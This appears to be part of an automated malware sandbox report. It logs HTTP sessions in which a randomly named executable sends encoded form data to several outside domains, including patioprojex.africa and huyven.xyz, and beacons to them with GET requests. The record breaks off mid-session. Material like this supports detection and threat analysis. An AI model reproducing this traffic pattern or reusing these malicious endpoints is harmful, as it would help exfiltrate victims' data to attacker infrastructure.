                                                                    Data Ascii: vxPD=XauOEEJ5ILE349Kbrhiz3WngBiC5Jyu799PoH4iTC+W+3Qa6yosWBRSnQL1PBsj8XXVqkS4gT55aav7NBXqpIzhgZj66O6dU1dzXP2EN+UY2+FmnKp4Xwlhu+wkszRtY6ro3dZpY2wG0RLvHhz4k7BaarsTsqrZ1SORKG5AXC5SyICejaV/Kcxww7J3uIs7DQmfU6m4=


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.5 | 49992 | 197.189.237.186 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:57.103473902 CET | 765 | OUT | POST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 79 2b 33 77 71 36 31 64 4d 57 47 52 53 6e 45 62 31 4f 4c 4d 6a 7a 58 58 59 5a 6b 58 51 67 54 35 39 61 61 72 33 4e 41 68 69 75 4f 6a 68 2b 54 7a 36 34 42 61 64 55 31 64 7a 58 50 32 52 57 2b 55 77 32 69 6b 57 6e 4c 4d 4d 55 73 31 68 74 35 77 6b 73 33 52 74 63 36 72 6f 52 64 63 41 31 32 7a 2b 30 52 4b 66 48 6c 79 34 6e 69 52 62 54 31 63 53 4a 72 75 41 73 49 50 64 6e 47 62 49 55 43 37 65 58 45 55 7a 4a 41 33 33 69 50 52 63 49 72 61 2f 5a 5a 63 61 71 4b 46 50 6b 6b 78 74 6c 36 31 42 7a 52 6a 72 58 35 54 58 32 31 64 46 55 2b 73 65 54
                                                                    Data Ascii: vxPD=XauOEEJ5ILE35Z2bpAizw2n/OCC5DSu399LoH7uDDMy+3wq61dMWGRSnEb1OLMjzXXYZkXQgT59aar3NAhiuOjh+Tz64BadU1dzXP2RW+Uw2ikWnLMMUs1ht5wks3Rtc6roRdcA12z+0RKfHly4niRbT1cSJruAsIPdnGbIUC7eXEUzJA33iPRcIra/ZZcaqKFPkkxtl61BzRjrX5TX21dFU+seT


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.5 | 49993 | 197.189.237.186 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:56:59.650847912 CET | 1782 | OUT | POST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 36 2b 32 44 53 36 32 37 45 57 48 52 53 6e 62 72 31 4c 4c 4d 6a 71 58 58 77 56 6b 58 55 76 54 37 31 61 62 4f 72 4e 48 54 4b 75 48 6a 68 2b 64 6a 36 31 4f 36 63 57 31 64 69 65 50 32 42 57 2b 55 77 32 69 6d 4f 6e 4d 5a 34 55 75 31 68 75 2b 77 6b 67 7a 52 74 34 36 6f 5a 6b 64 63 4d 44 6a 53 65 30 53 71 50 48 6a 51 51 6e 71 52 62 52 30 63 53 72 72 75 45 4a 49 50 42 64 47 61 4e 2f 43 34 2b 58 47 31 32 2f 54 79 58 4f 62 41 34 51 6b 35 76 31 5a 59 47 64 4a 58 48 51 35 54 35 36 31 57 49 61 47 6d 48 49 74 77 75 44 30 4d 51 62 2f 4c 50 76 62 47 77 65 4f 31 41 4d 42 75 54 4c 2f 62 32 78 57 56 53 35 33 51 39 42 79 4a 69 64 68 49 67 74 53 75 46 42 33 4e 5a 41 2f 6e 38 74 4f 59 73 64 79 61 55 4e 64 2b 45 31 31 6e 68 2b 62 65 6f 75 54 35 59 58 38 4d 57 76 77 76 76 34 66 77 41 78 63 41 71 76 66 73 4d 32 31 63 4e 48 77 36 57 31 68 4c 58 53 75 4f 47 4b 4a 78 50 39 78 49 6f 45 64 [TRUNCATED]
                                                                    Data Ascii: vxPD=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 [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.5 | 49994 | 197.189.237.186 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:57:02.195517063 CET | 477 | OUT | GET /iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.patioprojex.africa
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:57:04.018161058 CET507INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:57:03 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.24
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://patioprojex.africa/iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49995 | 162.0.238.246 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:30.031331062 CET | 721 | OUT | POST /dbbh/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 205
    Host: www.huyven.xyz
    Origin: http://www.huyven.xyz
    Referer: http://www.huyven.xyz/dbbh/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
    Data Ascii: vxPD=oYOmP/NSGiFpLBW3khbOQA/LI0bbeKs9Yb3smvSwqZRICo1g5C89HzTPsBwMSEeMa31tn3LFV8BG8iYLg692KZ40VfmUJSfkI+mK8J5dItm4Iq8zX2rxVA76j/DVqm8iRlgpauVh5snRi+Lm/YLuRTQAGUXYlnhS8bvtoGl0wxmRFElHNMk3svSGy0whI3mwDMU6PF8=
Oct 30, 2024 04:57:30.704444885 CET | 533 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 30 Oct 2024 03:57:30 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49996 | 162.0.238.246 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:32.586517096 CET | 741 | OUT | POST /dbbh/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 225
    Host: www.huyven.xyz
    Origin: http://www.huyven.xyz
    Referer: http://www.huyven.xyz/dbbh/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
    Data Ascii: vxPD=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrrFICJFg6AU9EzTPmhwJP0eSa3wQn33FV8lG8mULgtp1LJ42Z/mWUCfkI+mK8JswIsC4JaMzFC/wLQ751vDV728mRlgLasxH5qjRi73m4NrvKDQ8bkW8sWcD5rrCnUlxoXqzNSItXusf/P++in4WZHHZZvEKRSopJWnJ/cSklDKo+onzbOEm
Oct 30, 2024 04:57:33.264122009 CET | 533 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 30 Oct 2024 03:57:33 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49997 | 162.0.238.246 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:35.137769938 CET | 1758 | OUT | POST /dbbh/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 1241
    Host: www.huyven.xyz
    Origin: http://www.huyven.xyz
    Referer: http://www.huyven.xyz/dbbh/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
    Data Ascii: vxPD= [TRUNCATED]
Oct 30, 2024 04:57:35.808804035 CET | 533 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 30 Oct 2024 03:57:35 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49998 | 162.0.238.246 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:37.681313992 CET | 469 | OUT | GET /dbbh/?vxPD=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&7JH=bvSPlHnHQ4A HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.huyven.xyz
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Oct 30, 2024 04:57:38.351922989 CET | 548 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 30 Oct 2024 03:57:38 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49999 | 31.31.196.17 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:43.523920059 CET | 730 | OUT | POST /fbcx/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 205
    Host: www.dverkom.store
    Origin: http://www.dverkom.store
    Referer: http://www.dverkom.store/fbcx/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
    Data Ascii: vxPD=1XFCr+0Ft2zXo21hiaohV7W/o++SRKc1O11P6YdaUhp7D/CeEjHTR/RacQ7YknSrJjSmgpxUZyYXFy0jTKYolPVt6xPvFU1iQYmXuPLBvEDRjdE3s5oH9VgRPNASIh+47ysP6rEv62jbSoRDXmTXh3xvPfU04AKK6f30jkCskATx+0i1139Ygnj9/q8s5NIjvr5gq0Y=
Oct 30, 2024 04:57:44.516885042 CET | 375 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 30 Oct 2024 03:57:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50000 | 31.31.196.17 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:46.085351944 CET | 750 | OUT | POST /fbcx/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 225
    Host: www.dverkom.store
    Origin: http://www.dverkom.store
    Referer: http://www.dverkom.store/fbcx/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
    Data Ascii: vxPD=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBE57DfyeFiHTW/RaJg7Z6XSgJjeAgodUZz8XF3QjQ9N+kfVvmxPtL01iQYmXuPPrvAXRjtU3sYoEjFgQINASMh+87ysp6qIR61bbSphDX3TUv3xpF/VnrS3PwJjBok7W7z/u2iPfvV1wzHPFv50bo9pK1IpQ0jN5KcaKWVkcyg5ZFrXa0ai0
Oct 30, 2024 04:57:46.972646952 CET | 375 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 30 Oct 2024 03:57:46 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50001 | 31.31.196.17 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:57:48.620018005 CET | 1767 | OUT | POST /fbcx/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 1241
    Host: www.dverkom.store
    Origin: http://www.dverkom.store
    Referer: http://www.dverkom.store/fbcx/
    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBEx7DM6eEBfTX/RaVw7U6XS9JguMgoghZx0XK1YjYsN+ufVvtRPsFU13QZWbuPfrvAXRjrY3lpoEhFgRPNAOIh+E725c6qNk5E7bVJxDRFrUn3xrG/UgrS7EwND7okPs7wfunl7D8kBylVfko7kn6r962pNbpT59LPCqWgcOzEwtQP/u3ab+7QF7Q3axgg8NmQB1UNNcQSgt/xqp/23dm7cxq0traZAZktvmP2ksI0d+8M17sf5oVFukE2742NKspm4orMW7VCTB4f2lRF3cDF3mSBTELHS7szmf+ARguo2TcKXEa25EV2EZ6rAP6MB4fcBz7KMMNB0fj7hF0OBrtAW8iw5kNArdHlw3umTrlUJCvNSSr0JKGHgnIVTwge6XKKoYYpilMQegoO4Z+rc3lF8hzgxSC7/GVma+y182dBDDzFzrSnsLirXM7aJKI9Lm5h9XInGtHLDkcbguyo9AZwGpT1IqNXGgMWhem/zKzcMib6OsmpMdNRkeIzqrvgGEbwzBV6QylDzxUdXMYj9DhjPZ5E3K1TpzgGrl6TchhRcbbCOLxgtjKMmpFUDjxi/sq/dxqvQWcPi1c6hlJBrTZOfdZhoL+Zuxu0y3bSrUiOxCcjCbXuomzi+sBKU0xWnS80caNf8K81XI9qYoClPtFk5u5WY96ixYkuikUR3ZC7gE6pBQsviOPqrMbgQCo0q/+jymR+qRd+ytS9IcoWOJFcW+L5/psrgaJxY37xSCqrahBO9zJKosJ44ZH3Fgp0Nae9BkqbOneNoZKWmq4jyJfoaEyfelo/ItqVcD9PJEAQ0/ZfWmZA3jvZBLCyqd+JakzGiW36f2gVeIsrrUcm2nBFiQjsXIXkZxaNO5SNxoXU92WHCi0PD5d6dLzR+LkaXdVHoL8c2w2L8UGnpT15qphhXbemFRIsfaL4TIGBGxXtLr9vlUk868WsvrjL1HWsPGhUrxoE7 [TRUNCATED]
                                                                    Oct 30, 2024 04:57:49.496403933 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:49 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Encoding: gzip


                                                                    Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 50002 | Destination IP: 31.31.196.17 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:57:51.164398909 CET | 472 | OUT | GET /fbcx/?vxPD=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.dverkom.store
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:57:52.067540884 CET | 733 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:57:51 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 50003 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:05.341459036 CET | 745 | OUT | POST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:05.942195892 CET | 1031 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:05 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:05 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knq%2Fjg8Gj8oBQIJ7oL5moW30zRv493CfDFFj%2B8YLaBNYnISnw4Z8mCW4Twj0tdWDoy79NL5rRpzT8znnXnrNkzwRLWT8saraNS%2B3cfzt7ikY7X8xQiQWG1HAEPAIGb0L6fPknmQrlgj1"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c26a8ff3066-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1306&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 50004 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:07.891411066 CET | 765 | OUT | POST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:08.498311996 CET | 1029 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:08 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FXR9WePhiUPBH3CA5acdxDqbWI0CXzZxC6zAVlhEPM1AuJ2KXKxPVzN%2BZTRq9N4mPBpfvOFiNQGMGQKN5Ah3Ud4XVRykFfw8zxYaDrf7etUaMS3Vei0psWxo1VLVYmijrvvs2cZdDMa"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c36aa392e55-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 50005 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:10.437376022 CET | 1782 | OUT | POST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:11.039511919 CET | 1035 | IN | HTTP/1.1 301 Moved Permanently
